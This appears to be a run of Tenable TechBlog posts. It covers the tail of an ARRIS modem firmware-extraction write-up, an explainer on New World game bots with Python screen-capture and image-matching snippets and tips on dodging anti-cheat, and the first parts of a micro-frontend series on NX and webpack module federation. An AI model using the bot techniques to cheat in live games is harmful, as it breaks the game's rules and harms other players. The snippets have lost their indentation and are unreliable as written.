# Iterate over blocks, byte swap each 32-bit value
for i in range(0, nblocks):
current_block = dump[i*block:(i+1)*block]
j = 0
while j < len(current_block):
section = current_block[j:j+4]
f.write(section[::-1])
j = j + 4

Extract

Now it’s time to try all the usual tools again. This time, however, they should work nicely… well, mostly. Note that because we’ve stripped out the spare data that is normally used for error correction and whatnot, it’s likely that some things are going to fail for no apparent reason. Skip ’em and sort it out later if necessary. The tools used for this portion were binwalk and ubireader.

# binwalk rg1_little
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 UBI erase count header, version: 1, EC: 0x1, VID header offset: 0x800, data offset: 0x1000
… snip …
# tree -L 1 rootfs/
rootfs/
├── bin
├── boot
├── data
├── data_bak
├── dev
├── etc
├── home
├── lib
├── media
├── minidumps
├── mnt
├── nvram -> data
├── proc
├── rdklogs
├── root
├── run
├── sbin
├── sys
├── telemetry
├── tmp
├── usr
├── var
└── webs

Conclusion

Hopefully, this write-up will help someone out there dig into this device or others a little deeper.

Unfortunately, though, this is where we part ways. Since I need to move onto other projects for the time being, I would absolutely love for someone to pick this research up and run with it if at all possible. If you do, please feel free to reach out to me so that I can follow along with your work!


ARRIS CABLE MODEM TEARDOWN was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

New World’s Botting Problem

Source: https://pbs.twimg.com/profile_images/1392124727976546307/vBwCWL8W_400x400.jpg

New World, Amazon’s latest entry into the gaming world, is a massive multiplayer online game with a sizable player base. For those unfamiliar, think something in the vein of World of Warcraft or Runescape. After many delays and an arguably bumpy launch… well, we’ve got a nice glimpse at some surprising (and other not-so-surprising) bugs in recent weeks. These bugs include HTML injection in chat messages, gold dupes, invincible players, overpowered weapon glitches, etc. That said, this isn’t anything new for MMOs and is almost expected to occur to some extent. I don’t really care to talk much about any of those bugs, though, and would instead prefer to talk about something far more common to the MMO scene and something very unlikely to be resolved by patches or policies anytime soon (if ever): bots.

Since launch, there has been no shortage of players complaining about suspected bots, Reddit posts capturing people in the act, and gaming media discussing it ad nauseam. As with any and all MMOs before it, fighting the botting problem is going to be a never-ending battle for the developers. That said, what’s the point in running a bot for a game like this? And how do they work? That’s what we intend to cover in this post.

The Botting Economy

So why bot? Well, in my opinion, there are three categories people fall in when it comes to the reason for their botting:

  • Actual cheaters trying to take shortcuts and get ahead
  • People automating tasks they find boring, but who otherwise enjoy playing the rest of the game legitimately (this can technically be lumped into the above group)
  • Gold farmers trying to turn in-game resources into real-world currency

Each of the above reasons provides enough of a foundation and demand for botting and cheating services that there are entire online communities and marketplaces dedicated to providing these services in exchange for real-world money. For example, sites like OwnedCore.com exist purely for users to advertise and sell their services. The infamous WoW Glider sold enough copies and turned enough profit that it caused Blizzard Entertainment to sue the creator of the botting software. And entire marketplaces for the sale of gold and other in-game items can be found on sites like g2g.com.

This niche market isn’t reserved just for hobbyists either. There are entire companies and professional toolkits dedicated to this stuff. We’ve all heard of Chinese gold farming outlets, but the botting and cheating market extends well beyond that. For example, sites like IWANTCHEATS.NET, SystemCheats, and dozens of others exist just to sell tools geared towards specific games.

Many of the dedicated toolkits also market themselves as being user-customizable. These tools allow users to build their own cheats and bots with a more user-friendly interface. For example, Chimpeon is marketed as a full game automation solution. It operates as an auto clicker and “pixel detector,” similar to how open-source toolkits like pyAutoGUI work, which is the mechanic we’ll be exploring for the remainder of this post.

How do these things work?

Gaming bots, as with everything, come in all shapes and sizes with varying levels of sophistication. In the most complex scenarios, developers will reverse engineer the game and hook into functionality that allows them to interact with game components directly and access information that players don’t have access to under normal circumstances. This information could include things like being able to see what’s on the other side of a wall, when the next resource is going to spawn, or what fish/item is going to get hooked at the end of their fishing rod.

To bring the discussion back to New World, let’s talk about fishing. Fishing is a mechanic in the game that allows players to, you guessed it, fish. It’s a simple mechanic where the character in the game casts their fishing rod, waits for a bit, and then plays a little mini-game to determine if they caught the fish or not. This mini-game comes in the form of a visual prompt on the screen with an icon that changes colors. If it’s green, you press the mouse button to begin reeling in the fish. If it turns orange, back off a bit. If it turns red and stays red for too long, the fish will get away and the player will have to try again. Fishing provides a way for players to gain experience and level up their characters, retrieve resources to level up other skills (such as cooking or alchemy), or obtain rare items that can be sold to other players for a profit. As with any and all MMOs before it to feature this mechanic, New World is plagued with a billion different botting services that claim to automate this component of the game for players.

For the most sophisticated of these bots, there are ways to peek at the game’s memory to determine if the fish being caught is worth playing the minigame for or not. If it is, the bot will play the minigame for the player. If it is not, the bot will simply release the fish immediately without wasting the time playing the game for a low-quality reward. While I won’t be discussing it in this post, many others have taken the liberty of publishing their research into New World’s internals on popular cheating forums like UnknownCheats.me.

Running bots and tools that interact with the game in this manner is quite a risky endeavor due to how aggressive anti-cheat engines are these days, namely EasyAntiCheat — the engine used by New World and many other popular games. If the anti-cheat detects a known botting program running or sees game memory being inspected in ways that are not expected, it could lead to a player having their account permanently banned.

So what’s a safer option? What about all of these “undetectable” bots being advertised? They all claim to “not interact with the game’s process memory.” What’s that all about? Well, first off, that “undetectable” bit is a lie. Second, these bots are all very likely auto clickers and pixel detectors. This means they monitor specific portions of the game screen and wait for certain images or colors to appear, and then they perform a set of pre-determined actions accordingly.

The anti-cheat, however, can still detect if tools are monitoring the game’s screen or taking automated actions. It’s not normal for a person to sit at their computer for 100 hours straight making the exact same mouse movements over and over. Obviously, anti-cheat developers could add mitigations here, but it’s really a neverending game of cat and mouse. That said, there are plenty of legitimate tools out there that do make this a much safer option, such as running their screen watchers on a totally different computer. Windows Remote Desktop, Team Viewer, or some sort of VNC are perfectly normal tools one would run to check in on their computer remotely. What’s not to say they couldn’t monitor the screen this way? Well, nothing. And that’s exactly what many of the popular services, such as Chimpeon linked earlier, actually recommend. Again, running a bot with this method could still be detected, but it takes much more effort and is more prone to false positives, which may be against the interest of the game studio if they were to falsely ban legitimate players.

For example, a New World fishing bot only needs to monitor the area of the screen used for the minigame. If the right icons and colors are detected, reel the fish in. If the bad colors are detected, pause for a moment. This doesn’t have the advantage of being able to only catch good fish, but it’s much better than running a tool that’s highly likely to be detected by the anti-cheat at some point.

Let’s see one of these in action:

In the video above, we can see exactly how this bot operates. Basically, the user configures the game so that the colors and images appear as the botting software expects, and then chooses a region of the game to interact with. From there, the bot does all the work of playing the fishing minigame automatically.

While I won’t be posting a direct tutorial on how to build your own bot, I’d like to demonstrate the basic building blocks required to create one. That said, there are plenty of code samples available online already, which incidentally, are noted to have been detected by the anti-cheat and gotten players banned already.

Let’s Build One

As already mentioned, this will not be a fully functional bot, but it will demonstrate the basic building blocks. This demo will be done on a macOS host using Python.

So what’re the components we’ll need:

  • A way to capture a portion of the screen
  • A way to detect a specific pattern in the screen capture
  • A way to send mouse/keyboard inputs

Let’s get to it.

First, let’s create a loop to continuously capture a portion of the screen.

import mss
while True:
# 500x500 pixel region
region=(500, 500, 1000, 1000)
with mss.mss() as screen:
img = screen.grab(region)
mss.tools.to_png(img.rgb, img.size, output="sample.png")

Next, we’ll want a way to detect a given image within our image. For this demo, I’ve chosen to use the Tenable logo. We’ll use the OpenCV library for detection.

import cv2
import mss
from numpy import array
to_detect = cv2.imread("./tenable.jpg", cv2.IMREAD_UNCHANGED)
while True:
# 500x500 pixel region
region=(500, 500, 1000, 1000)
    # Grab region
with mss.mss() as screen:
img = screen.grab(region)
mss.tools.to_png(img.rgb, img.size, output="sample.png")
    # Convert image to format usable by cv2
img_cv = cv2.cvtColor(array(img), cv2.COLOR_RGB2BGR)
    # Check if the tenable logo is present
result = cv2.matchTemplate(img_cv, to_detect, eval('cv2.TM_CCOEFF_NORMED'))
if((result >= 0.6).any()):
print('DETECTED')
break

Running the above and dragging a logo template into the region of the screen this is on will trigger the “DETECTED” message. To note, this code snippet may not work exactly as written depending on your monitor setup and configured resolution. There might be settings that need to be tweaked in some scenarios.

That’s it. No seriously, that’s it. The only thing left is to add mouse and keyboard actions, which is easy enough with a library like pynput.

What’s being done about it?

What is Amazon doing in order to provide a solution to this issue? Honestly, who knows? The game is just over a month old at this point, so it’s far too early to tell how Amazon Game Studios plans to handle the botting problem they have on their hands. Obviously, we’re seeing plenty of players report the issues and many ban waves already appear to have happened. To be clear, botting in any form and buying/selling in-game resources from third parties is already against the game’s terms and conditions. In fact, there are slight mitigations against these forms of attacks in the game already, such as changing the viewing angle after fishing attempts, so it’s unclear whether or not further mitigations are under consideration. Only time will tell at this point.

As mentioned earlier, the purpose of this blog was not to call out AGS or New World for simply having this issue as it isn’t unique to this game by any stretch of the imagination. The purpose of this article was to shed some light on how basic many of these botting services actually are to those that may be unaware.


New World’s Botting Problem was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

1. Introduction: Our Journey Implementing a Micro Frontend

Introduction: Our Journey Implementing a Micro Frontend

In the current world of frontend development, picking the right architecture and tech stack can be challenging. With all of the libraries, frameworks, and technologies available, it can seem (to say the least) overwhelming. Learning how other companies tackle a particular challenge is always beneficial to the community as a whole. Therefore, in this series, we hope to share the lessons we have learned in creating a successful micro-frontend architecture.

What This Series is About

While the term “micro-frontend” has been around for some time, the manner in which you build this type of architecture is ever evolving. New solutions and strategies are introduced all the time, and picking the one that is right for you can seem like an impossible task. This series focuses on creating a micro-frontend architecture by leveraging the NX framework and webpack’s module federation (released in webpack 5). We’ll detail each of our phases from start to finish, and document what we encountered along the way.

The series is broken up into the following articles:

  • Why We Implemented a Micro Frontend — Explains the discovery phase shown in the infographic above. It talks about where we started and, specifically, what our architecture used to look like and where the problems within that architecture existed. It then goes on to describe how we planned to solve our problems with a new architecture.
  • Introducing the Monorepo and NX — Documents the initial phase of updating our architecture, during which we created a monorepo built off the NX framework. This article focuses on how we leverage NX to identify which part of the repository changed, allowing us to only rebuild that portion.
  • Introducing Module Federation — Documents the next phase of updating our architecture, where we broke up our main application into a series of smaller applications using webpack’s module federation.
  • Module Federation — Managing Your Micro-Apps —Focuses on how we enhanced our initial approach to building and serving applications using module federation, namely by consolidating the related configurations and logic.
  • Module Federation — Sharing Vendor Code —Details the importance of sharing vendor library code between applications and some related best practices.
  • Module Federation — Sharing Library Code — Explains the importance of sharing custom library code between applications and some related best practices.
  • Building and Deploying — Documents the final phase of our new architecture where we built and deployed our application utilizing our new micro-frontend model.
  • Summary —Reviews everything we discussed and provides some key takeaways from this series.

Who is This For?

If you find yourself in any of the categories below, then this series is for you:

  • You’re an engineer just getting started, but you have a strong interest in architecture.
  • You’re a seasoned engineer managing an ever-growing codebase that keeps getting slower.
  • You’re a technical director and you’d like to see an alternative to how your teams work and ship their code.
  • You work with engineers on a daily basis, and you’d really like to understand what they mean when they say a micro-frontend.
  • You really just like to read!

In conclusion, read on if you want a better understanding of how you can successfully implement a micro-frontend architecture from start to finish.

How Articles are Structured

Each article in the series is split into two primary parts. The first half (overview, problem, and solution) gives you a high level understanding of the topic of discussion. If you just want to view the “cliff notes”, then these sections are for you.

The second half (diving deeper) is more technical in nature, and is geared towards those who wish to see how we actually implemented the solution. For most of the articles in this series, this section includes a corresponding demo repository that further demonstrates the concepts within the article.

Summary

So, let’s begin! Before we dive into how we updated our architecture, it’s important to discuss the issues we faced that led us to this decision. Check out the next article in the series to get started.


1. Introduction: Our Journey Implementing a Micro Frontend was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

2. Why We Implemented A Micro Frontend

Why We Implemented A Micro Frontend

This is post 2 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

This article documents the discovery phase of our journey toward a new architecture. Like any engineering group, we didn’t simply wake up one day and decide it would be fun to rewrite our entire architecture. Rather, we found ourselves with an application that was growing exponentially in size and complexity, and discovered that our existing architecture didn’t support this type of growth for a variety of reasons. Before we dive into how we revamped our architecture to fix these issues, let’s set the stage by outlining what our architecture used to look like and where the problems existed.

Our Initial Architecture

When one of our core applications (Tenable.io) was first built, it consisted of two separate repositories:

  • Design System Repository — This contained all the global components that were used by Tenable.io. For each iteration of a given component, it was published to a Nexus repository (our private npm repository) leveraging Lerna. Package versions were incremented following semver (ex. 1.0.0). Additionally, it also housed a static design system site, which was responsible for documenting the components and how they were to be used.
  • Tenable.io Repository — This contained a single page application built using webpack. The application itself pulled down components from the Nexus repository according to the version defined in the package.json.

This was a fairly traditional architecture and served us well for some time. Below is a simplified diagram of what this architecture looked like:

The Problem

As our application continued to grow, we created more teams to manage individual parts of the application. While this was beneficial in the sense that we were able to work at a quicker pace, it also led to a variety of issues.

Component Isolation

Due to global components living in their own repository, we began encountering an issue where components did not always work appropriately when they were integrated into the actual application. While developing a component in isolation is nice from a developmental standpoint, the reality is that the needs of an application are diverse, and typically this means that a component must be flexible enough to account for these needs. As a result, it becomes extremely difficult to determine if a component is going to work appropriately until you actually try to leverage it in your application.

Solution #1 — Global components should live in close proximity to the code leveraging those components. This ensures they are flexible enough to satisfy the needs of the engineers using them.

Component Bugs & Breaking Changes

We also encountered a scenario where a bug was introduced in a given component but was not found or realized until a later date. Since component updates were made in isolation within another repository, engineers working on the Tenable.io application would only pull in updated components when necessary. When this did occur, they were typically jumping between multiple versions at once (ex. 1.0.0 to 1.4.5). When the team discovered a bug, it may have been from one of the versions in between (ex. 1.2.2). Trying to backtrack and identify which particular version introduced the bug was a time-consuming process.

Solution #2 — Updates to global components should be tested in real time against the code leveraging those components. This ensures the updates are backwards compatible and non-breaking in nature.

One Team Blocks All Others

One of the most significant issues we faced from an architectural perspective was the blocking nature of our deployments. Even though a large number of teams worked on different areas of the application that were relatively isolated, if just one team introduced a breaking change it blocked all the other teams.

Solution #3 — Feature teams should move at their own pace, and their impact on one another should be limited as much as possible.

Slow Development

As we added more teams and more features to Tenable.io, the size of our application continued to grow, as demonstrated below.

If you’ve ever been the one responsible for managing the webpack build of your application, you’ll know that the bigger your application gets, the slower your build becomes. This is simply a result of having more code that must be compiled/re-compiled as engineers develop features. This not only impacted local development, but our Jenkins build was also getting slower over time as things grew, because it had to lint, test, and build more and more over time. We employed a number of solutions in an attempt to speed up our build, including: The DLL Plugin, SplitChunksPlugin, Tweaking Our Minification Configuration, etc. However, we began realizing that at a certain point there wasn’t much more we could do and we needed a better way to build out the different parts of the application (note: something like parallel-webpack could have helped here if we had gone down a different path).

Solution #4 — Engineers should be capable of building the application quickly for development purposes regardless of the size of the application as it grows over time. In addition, Jenkins should be capable of testing, linting, and building the application in a performant manner as the system grows.

The Solution

At a certain point, we decided that our architecture was not satisfying our needs. As a result, we made the decision to update it. Specifically, we believed that moving towards a monorepo based on a micro-frontend architecture would help us address these needs by offering the following benefits:

  • Monorepo — While definitions vary, in our case a monorepo is a single repository that houses multiple applications. Moving to a monorepo would entail consolidating the Design System and the Tenable.io repositories into one. By combining them into one repository, we can ensure that updates made to components are tested in real time by the code consuming them and that the components themselves are truly satisfying the needs of our engineers.
  • Micro-Frontend — As defined here, a “Micro-frontend architecture is a design approach in which a front-end app is decomposed into individual, semi-independent ‘microapps’ working loosely together.” For us, this means splitting apart the Tenable.io application into multiple micro-applications (we’ll use this term moving forward). Doing this allows teams to move at their own pace and limit their impact on one another. It also speeds up the time to build the application locally by allowing engineers to choose which micro applications to build and run.

Summary

With these things in mind, we began to develop a series of architectural diagrams and roadmaps that would enable us to move from point A to point B. Keep in mind, though, at this point we were dealing with an enterprise application that was in active development and in use by customers. For anyone who has ever been through this process, trying to revamp your architecture at this stage is somewhat akin to changing a tyre while driving.

As a result, we had to ensure that as we moved towards this new architecture, our impact on the normal development and deployment of the application was minimal. While there were plenty of bumps and bruises along the way, which we will share as we go, we were able to accomplish this through a series of phases. In the following articles, we will walk through these phases. See the next article to learn how we moved to a monorepo leveraging the NX framework.


2. Why We Implemented A Micro Frontend was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

3. Introducing The Monorepo & NX

Introducing The Monorepo & NX

This is post 3 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

In this next phase of our journey, we created a monorepo built off the NX framework. The focus of this article is on how we leverage NX to identify which part of the repository changed, allowing us to only rebuild that portion. As discussed in the previous article, our teams were plagued by a series of issues that we believed could be solved by moving towards a new architecture. Before we dive into the first phase of this new architecture, let’s recap one of the issues we were facing and how we solved it during this first phase.

The Problem

Our global components lived in an entirely different repository, where they had to be published and pulled down through a versioning system. To do this, we leveraged Lerna and Nexus, which is similar to how 3rd-party NPM packages are deployed and utilized. As a result of this model, we constantly dealt with issues pertaining to component isolation and breaking changes.

To address these issues, we wanted to consolidate the Design System and Tenable.io repositories into one. To ensure our monorepo would be fast and efficient, we also introduced the NX framework to only rebuild parts of the system that were impacted by a change.

The Solution

The Monorepo Is Born

The first step in updating our architecture was to bring the Design System into the Tenable.io repository. This involved the following:

  • Design System components — The components themselves were broken apart into a series of subdirectories that all lived under libs/design-system. In this way, they could live alongside our other Tenable.io specific libraries.
  • Design System website — The website (responsible for documenting the components) was moved to live alongside the Tenable.io application in a directory called apps/design-system.

The following diagram shows how we created the new monorepo based on these changes.

It’s important to note that at this point, we made a clear distinction between applications and libraries. This distinction is important because we wanted to ensure a clear import order: that is, we wanted applications to be able to consume libraries but never the other way around.

Leveraging NX

In addition to moving the design system, we also wanted the ability to only rebuild applications and libraries based on what was changed. In a monorepo where you may end up having a large number of applications and libraries, this type of functionality is critical to ensure your system doesn’t grow slower over time.

Let’s use an example to demonstrate the intended functionality: In our example, we have a component that is initially only imported by the Design System site. If an engineer changes that component, then we only want to rebuild the Design System because that’s the only place that was impacted by the change. However, if Tenable.io was leveraging that component as well, then both applications would need to be rebuilt. To manage this complexity, we rebuilt the repository using NX.

So what is NX? NX is a set of tools that enables you to separate your libraries and applications into what NX calls “workspaces”. Think of a workspace as an area in your repository (i.e. a directory) that houses shared code (an application, a utility library, a component library, etc.). Each workspace has a series of commands that can be run against it (build, serve, lint, test, etc.). This way when a workspace is changed, the nx affected command can be run to identify any other workspace that is impacted by the update. As demonstrated here, when we change Component A (living in the design-system/components workspace) and run the affected command, NX indicates that the following three workspaces are impacted by that change: design-system/components, Tenable.io, and Design System. This means that both the Tenable.io and Design System applications are importing that component.

This type of functionality is critical for a monorepo to work as it scales in size. Without this your automation server (Jenkins in our case) would grow slower over time because it would have to rebuild, re-lint, and re-test everything whenever a change was made. If you want to learn more about how NX works, please take a look at this write up that explains some of the above concepts in more detail.

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about how NX works and the way in which things can be set up. If you wish to see the code associated with the following section, you can check it out in this branch.

At this point, our repository looks something like the structure of defined workspaces below:

Apps

  • design-system — The static site (built off of Gatsby) that documents our global components.
  • tenable-io — Our core application that was already in the repository.

Libs

  • design-system/components — A library that houses our global components.
  • design-system/styles — A library that is responsible for setting up our global theme provider.
  • tenable-io/common — The pre-existing shared code that the Tenable.io application was leveraging and sharing throughout the application.

To reiterate, a workspace is simply a directory in your repository that houses shared code that you want to treat as either an application or a library. The difference here is that an application is standalone in nature and shows what your consumers see, whereas a library is something that is leveraged by n+ applications (your shared code). As shown below, each workspace can be configured with a series of targets (build, serve, lint, test) that can be run against it. This way if a change has been made that impacts the workspace and we want to build all of them, we can tell NX to run the build target (line 6) for all affected workspaces.

At this point, our two demo applications resemble the screenshots below. As you can see, there are three library components in use. These are the black, gray, and blue colored blocks on the page. Two of these come from the design-system/components workspace (Test Component 1 & 2), and the other comes from tenable-io/common (Tenable.io Component). These components will be used to demonstrate how applications and libraries are leveraged and relate to one another in the NX framework.

The Power Of NX

Now that you know what our demo application looks like, it’s time to demonstrate the importance of NX. Before we make any updates, we want to showcase the dependency graph that NX uses when analyzing our repository. By running the command nx dep-graph, the following diagram appears and indicates how our various workspaces are related. A relationship is established when one app/lib imports from another.

We now want to demonstrate the true power and purpose of NX. We start by running the nx affected:apps and nx affected:libs command with no active changes in our repository. Shown below, no apps or libs are returned by either of these commands. This indicates that there are no changes currently in our repository, and, as a result, nothing has been affected.

Now we will make a slight update to our test-component-1.tsx file (line 19):

If we re-run the affected commands above we see that the following apps/lib are impacted: design-system, tenable-io, and design-system/components:

Additionally, if we run nx affected:dep-graph we see the following diagram. NX is showing us the above command in visual form, which can be helpful in understanding why the change you made impacted a given application or library.

With all of this in place, we can now accomplish a great deal. For instance, a common scenario (and one our initial goals from the previous article) is to run tests for just the workspaces actually impacted by a code change. If we change a global component, we want to run all the unit tests that may have been impacted by that change. This way, we can ensure that our update is truly backwards compatible (which gets harder and harder as a component is used in more locations). We can accomplish this by running the test target on the affected workspaces:

Summary

Now you are familiar with how we set up our monorepo and incorporated the NX framework. By doing this, we were able to accomplish two of the goals we started with:

  1. Global components should live in close proximity to the code leveraging those components. This ensures they are flexible enough to satisfy the needs of the engineers using them.
  2. Updates to global components should be tested in real time against the code leveraging those components. This ensures the updates are backwards compatible and non-breaking in nature.

Once we successfully set up our monorepo and incorporated the NX framework, our next step was to break apart the Tenable.io application into a series of micro applications that could be built and deployed independently. See the next article in the series to learn how we did this and the lessons we learned along the way.


3. Introducing The Monorepo & NX was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

4. Introducing Module Federation

Introducing Module Federation

This is post 4 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

As discussed in the previous article, the first step in updating our architecture involved the consolidation of our two repositories into one and the introduction of the NX framework. Once this phase was complete, we were ready to move to the next phase: the introduction of module federation for the purposes of breaking our Tenable.io application into a series of micro-apps.

The Problem

Before we dive into what module federation is and why we used it, it’s important to first understand the problem we wanted to solve. As demonstrated in the following diagram, multiple teams were responsible for individual parts of the Tenable.io application. However, regardless of the update, everything went through the same build and deployment pipeline once the code was merged to master. This created a natural bottleneck where each team was reliant on any change made previously by another team.

This was problematic for a number of reasons:

  • Bugs — Imagine your team needs to deploy an update to customers for your particular application as quickly as possible. However, another team introduced a relatively significant bug that should not be deployed to production. In this scenario, you either have to wait for the other team to fix the bug or release the code to production while knowingly introducing the bug. Neither of these are good options.
  • Slow to lint, test and build — As discussed previously, as an application grows in size, things such as linting, testing, and building inevitably get slower as there is simply more code to deal with. This has a direct impact on your automation server/delivery pipeline (in our case Jenkins) because the pipeline will most likely get slower as your codebase grows.
  • E2E Testing Bottleneck — End-to-end tests are an important part of an enterprise application to ensure bugs are caught before they make their way to production. However, running E2E tests for your entire application can cause a massive bottleneck in your pipeline as each build must wait on the previous build to finish before proceeding. Additionally, if one team’s E2E tests fail, it blocks the other team’s changes from making it to production. This was a significant bottleneck for us.

The Solution

Let’s discuss why module federation was the solution for us. First, what exactly is module federation? In a nutshell, it is webpack’s way of implementing a micro-frontend (though it’s not limited to only implementing frontend systems). More specifically, it enables us to break apart our application into a series of smaller applications that can be developed and deployed individually, and then put back together into a single application. Let’s analyze how our deployment model above changes with this new approach.

As shown below, multiple teams were still responsible for individual parts of the Tenable.io application. However, you can see that each individual application within Tenable.io (the micro-apps) has its own Jenkins pipeline where it can lint, test, and build the code related to that individual application. But how do we know which micro-app was impacted by a given change? We rely on the NX framework discussed in the previous article. As a result of this new model, the bottleneck shown above is no longer an issue.

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about how module federation works and the way in which things can be set up. If you wish to see the code associated with the following section, you can check it out in this branch.

Diagrams are great, but what does a system like this actually look like from a code perspective? We will build off the demo from the previous article to introduce module federation for the Tenable.io application.

Workspaces

One of the very first changes we made was to our NX workspaces. New workspaces are created via the npx create-nx-workspace command. For our purposes, the intent was to split up the Tenable.io application (previously its own workspace) into three individual micro-apps:

  • Host — Think of this as the wrapper for the other micro-apps. Its primary purpose is to load in the micro-apps.
  • Application 1 — Previously, this was apps/tenable-io/src/app/app-1.tsx. We are now going to transform this into its own individual micro-app.
  • Application 2 — Previously, this was apps/tenable-io/src/app/app-2.tsx. We are now going to transform this into its own individual micro-app.

This simple diagram illustrates the relationship between the Host and micro-apps:

Let’s analyze a before and after of our workspace.json file that shows how the tenable-io workspace (line 5) was split into three (lines 4–6).

Before (line 5)

After (lines 4–6)

Note: When leveraging module federation, there are a number of different architectures you can leverage. In our case, a host application that loaded in the other micro-apps made the most sense for us. However, you should evaluate your needs and choose the one that’s best for you. This article does a good job in breaking these options down.

Workspace Commands

Now that we have these three new workspaces, how exactly do we run them locally? If you look at the previous demo, you’ll see our serve command for the Tenable.io application leveraged the @nrwl/web:dev-server executor. Since we’re going to be creating a series of highly customized webpack configurations, we instead opted to leverage the @nrwl/workspace:run-commands executor. This allowed us to simply pass a series of terminal commands that get run. For this initial setup, we’re going to leverage a very simple approach to building and serving the three applications. As shown in the commands below, we simply change directories into each of these applications (via cd apps/…), and run the npm run dev command that is defined in each of the micro-app’s package.json file. This command starts the webpack dev server for each application.

The serve target for host — Kicks off the dev servers for all 3 apps
Dev command for host — Applications 1 & 2 are identical

At this point, if we run nx serve host (serve being one of the targets defined for the host workspace) it will kick off the three commands shown on lines 10–12. Later in the article, we will show a better way of managing multiple webpack configurations across your repository.

Webpack Configuration — Host

The following configuration shows a pretty bare bones implementation for our Host application. We have explained the various areas of the configuration and their purpose. If you are new to webpack, we recommend you read through their getting started documentation to better understand how webpack works.

Some items of note include:

  • ModuleFederationPlugin — This is what enables module federation. We’ll discuss some of the sub properties below.
  • remotes — This is the primary difference between the host application and the applications it loads in (application 1 and 2). We define application1 and application2 here. This tells our host application that there are two remotes that exist and that can be loaded in.
  • shared — One of the concepts you’ll need to get used to in module federation is the concept of sharing resources. Without this configuration, webpack will not share any code between the various micro-applications. This means that if application1 and application2 both import react, they each will use their own versions. Certain libraries (like the ones defined here) only allow you to load one version of the library for your application. This can cause your application to break if the library gets loaded in more than once. Therefore, we ensure these libraries are shared and only one version gets loaded in.
  • devServer — Each of our applications has this configured, and it serves each of them on their own unique port. Note the addition of the Access-Control-Allow-Origin header: this is critical for dev mode to ensure the host application can access other ports that are running our micro-applications.

Webpack Configuration — Application

The configurations for application1 and application2 are nearly identical to the one above, with the exception of the ModuleFederationPlugin. Our applications are responsible for determining what they want to expose to the outside world. In our case, the exposes property of the ModuleFederationPlugin defines what is exposed to the Host application when it goes to import from either of these. This is the exposes property’s purpose: it defines a public API that determines which files are consumable. So in our case, we will only expose the index file (‘.’) in the src directory. You’ll see we’re not defining any remotes, and this is intentional. In our setup, we want to prevent micro-applications from importing resources from each other; if they need to share code, it should come from the libs directory.

In this demo, we’re keeping things as simple as possible. However, you can expose as much or as little as you want based on your needs. So if, for example, we wanted to expose an individual component, we could do that using the following syntax:

Initial Load

When we run nx serve host, what happens? The entry point for our host application is the index.js file shown below. This file imports another file called boostrap.js. This approach avoids the error “Shared module is not available for eager consumption,” which you can read more about here.

The bootstrap.js file is the real entry point for our Host application. We are able to import Application1 and Application2 and load them in like a normal component (lines 15–16):

Note: Had we exposed more specific files as discussed above, our import would be more granular in nature:

At this point, you might think we’re done. However, if you ran the application you would get the following error message, which tells us that the import on line 15 above isn’t working:

Loading The Remotes

To understand why this is, let’s take a look at what happens when we build application1 via the webpack-dev-server command. When this command runs, it actually serves this particular application on port 3001, and the entry point of the application is a file called remoteEntry.js. If we actually go to that port/file, we’ll see something that looks like this:

In the module federation world, application 1 & 2 are called remotes. According to their documentation, “Remote modules are modules that are not part of the current build and loaded from a so-called container at the runtime”. This is how module federation works under the hood, and is the means by which the Host can load in and interact with the micro-apps. Think of the remote entry file shown above as the public interface for Application1, and when another application loads in the remoteEntry file (in our case Host), it can now interact with Application1.

We know application 1 and 2 are getting built, and they’re being served up at ports 3001 and 3002. So why can’t the Host find them? The issue is because we haven’t actually done anything to load in those remote entry files. To make that happen, we have to open up the public/index.html file and add those remote entry files in:

Our host specifies the index.html file
The index.html file is responsible for loading in the remote entries

Now if we run the host application and investigate the network traffic, we’ll see the remoteEntry.js file for both application 1 and 2 get loaded in via ports 3001 and 3002:

Summary

At this point, we have covered a basic module federation setup. In the demo above, we have a Host application that is the main entry point for our application. It is responsible for loading in the other micro-apps (application 1 and 2). As we implemented this solution for our own application we learned a number of things along the way that would have been helpful to know from the beginning. See the following articles to learn more about the intricacies of using module federation:


4. Introducing Module Federation was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

5. Module Federation — Managing Your Micro-Apps

Module Federation — Managing Your Micro-Apps

This is post 5 of 9 in the series

  1. Introduction
  2. Why We Implemented a Micro Frontend
  3. Introducing the Monorepo & NX
  4. Introducing Module Federation
  5. Module Federation — Managing Your Micro-Apps
  6. Module Federation — Sharing Vendor Code
  7. Module Federation — Sharing Library Code
  8. Building & Deploying
  9. Summary

Overview

The Problem

When you first start using module federation and only have one or two micro-apps, managing the configurations for each app and the various ports they run on is simple.

As you progress and continue to add more micro-apps, you may start running into issues with managing all of these micro-apps. You will find yourself repeating the same configuration over and over again. You’ll also find that the Host application needs to know which micro-app is running on which port, and you’ll need to avoid serving a micro-app on a port already in use.

The Solution

To reduce the complexity of managing these various micro-apps, we consolidated our configurations and the serve command (to spin up the micro-apps) into a central location within a newly created tools directory:

Diving Deeper

Before You Proceed: The remainder of this article is very technical in nature and is geared towards engineers who wish to learn more about how we dealt with managing an ever growing number of micro-apps. If you wish to see the code associated with the following section, you can check it out in this branch.

